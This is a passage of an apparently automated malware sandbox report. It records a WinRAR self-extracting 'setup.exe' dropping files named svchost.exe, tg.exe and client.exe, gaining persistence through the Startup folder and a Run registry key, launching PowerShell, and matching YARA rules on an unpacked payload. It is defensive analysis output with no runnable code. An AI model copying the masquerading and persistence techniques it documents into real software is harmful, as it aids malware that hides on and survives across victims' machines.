        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: iphlpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: dnsapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: dhcpcsvc6.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: dhcpcsvc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: winnsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: rasapi32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: rasman.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
        Source: C:\Users\user\Desktop\setup.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32Jump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
        Source: setup.exeStatic file information: File size 30661632 > 1048576
        Source: setup.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x1d0fc00
        Source: Binary string: D:\Projects\WinRAR\SFX\build\sfxrar64\Release\sfxrar.pdb source: setup.exe, 00000000.00000002.1782894473.0000000004B87000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000000.1692339333.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp

        Data Obfuscation

        barindex
        Source: C:\Users\user\AppData\Local\Temp\tg.exe Unpacked PE file: 4.2.tg.exe.400000.0.unpack
        Source: Yara match File source: 4.2.tg.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match File source: 4.0.tg.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match File source: C:\Users\user\AppData\Local\Temp\tg.exe, type: DROPPED
        Source: C:\Users\user\AppData\Local\Temp\tg.exe Code function: 4_2_0040A83A LoadLibraryW,GetProcAddress,wcscpy,wcscat,wcslen,CoTaskMemFree,FreeLibrary,wcscat,wcslen, 4_2_0040A83A
        Source: C:\Users\user\AppData\Local\Temp\svchost.exe File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\__tmp_rar_sfx_access_check_4463921
        Source: svchost.exe.0.dr Static PE information: section name: .didat
        Source: tg.exe.0.dr Static PE information: section name: .code
        Source: client.exe.0.dr Static PE information: section name: .didata
        Source: client.exe.0.dr Static PE information: section name: .debug
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_04CC6358 pushad ; ret 1_2_04CC6361
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exe Code function: 7_2_00412185 push ecx; ret 7_2_00412198
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exe Code function: 7_2_00402A39 push ss; retf 7_2_00402A3A
        Source: C:\ProgramData\svchost\svchost.exe Code function: 10_2_00423111 push 00002ADEh; mov dword ptr [esp], edi 10_2_00423120
        Source: C:\ProgramData\svchost\svchost.exe Code function: 10_2_00421928 push FFFFFFC5h; ret 10_2_00421927
        Source: C:\ProgramData\svchost\svchost.exe Code function: 10_2_00412185 push ecx; ret 10_2_00412198
        Source: C:\ProgramData\svchost\svchost.exe Code function: 10_2_00402A39 push ss; retf 10_2_00402A3A
        Source: C:\ProgramData\svchost\svchost.exe Code function: 10_2_00424AFD push 0000117Fh; mov dword ptr [esp], ebx 10_2_00424B02
        Source: C:\ProgramData\svchost\svchost.exe Code function: 10_2_00423BDE push 000078BBh; mov dword ptr [esp], ecx 10_2_00423BF7
        Source: C:\ProgramData\svchost\svchost.exe Code function: 10_2_00421E7E push 00002ADEh; mov dword ptr [esp], edi 10_2_00423120
        Source: C:\ProgramData\svchost\svchost.exe Code function: 10_2_00422ED9 push 000011A0h; mov dword ptr [esp], eax 10_2_004246A4
        Source: C:\ProgramData\svchost\svchost.exe Code function: 18_2_00412185 push ecx; ret 18_2_00412198
        Source: C:\ProgramData\svchost\svchost.exe Code function: 18_2_00402A39 push ss; retf 18_2_00402A3A
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 23_2_00007FFD9BAACB20 pushad ; ret 23_2_00007FFD9BAACBB1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 23_2_00007FFD9BAACA58 pushad ; ret 23_2_00007FFD9BAACBB1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 23_2_00007FFD9BAA2035 push eax; iretd 23_2_00007FFD9BAA233D
        Source: svchost.exe.3.dr Static PE information: section name: .text entropy: 6.823487500781107
        Source: svchost.exe.3.dr Static PE information: section name: .data entropy: 7.15327780189184
        Source: svchost.exe.7.dr Static PE information: section name: .text entropy: 6.823487500781107
        Source: svchost.exe.7.dr Static PE information: section name: .data entropy: 7.15327780189184

        Persistence and Installation Behavior

        barindex
        Source: C:\Users\user\Desktop\setup.exe File created: C:\Users\user\AppData\Local\Temp\svchost.exe
        Source: C:\Users\user\AppData\Local\Temp\svchost.exe File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exe
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exe File created: C:\ProgramData\svchost\svchost.exe
        Source: C:\Users\user\Desktop\setup.exe File created: C:\Users\user\AppData\Local\Temp\client.exe
        Source: C:\Users\user\Desktop\setup.exe File created: C:\Users\user\AppData\Local\Temp\tg.exe

        Boot Survival

        barindex
        Source: C:\Users\user\AppData\Local\Temp\svchost.exe File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exe
        Source: C:\Users\user\AppData\Local\Temp\svchost.exe File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\__tmp_rar_sfx_access_check_4463921
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run svchost

        Hooking and other Techniques for Hiding and Protection

        barindex
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Users\user\Desktop\setup.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\svchost.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\tg.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\svchost\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
